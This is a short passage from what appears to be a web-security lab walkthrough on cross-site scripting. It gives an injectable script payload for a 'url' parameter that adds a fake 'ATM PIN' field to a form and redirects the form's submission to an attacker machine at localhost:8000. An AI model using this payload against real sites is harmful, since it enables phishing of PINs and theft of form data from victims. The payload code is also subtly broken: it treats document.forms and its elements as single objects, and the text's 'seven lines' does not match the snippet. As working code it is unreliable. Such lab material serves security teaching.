Task 4: Modify Form Fields | Task Link
In this task, you have to insert an extra form element into the existing form and submit the form to an attacker-controlled machine. This has to be done dynamically using XSS vulnerability.
Again by adopting the same approach, analyze the source code and find the injection point. The injection point in this task is “url” parameter. Copy and URL-encode the code given below and paste it after the “url” parameter.
<script> var frcon = document.forms; var atm = document.createElement('input'); atm.type = 'text'; atm.name = 'atm'; atm.placeholder = 'ATM PIN'; atm.class = 'input-block-level'; frcon.insertBefore(atm,frcon.elements); frcon.action = "http://localhost:8000/" </script>
In this code first seven lines are used to create new form element “ATM” and the last line is again from last challenge used to change the action of the form. When victim submits the form, the input elements will be sent to attacker machine through GET request, same as in the last task.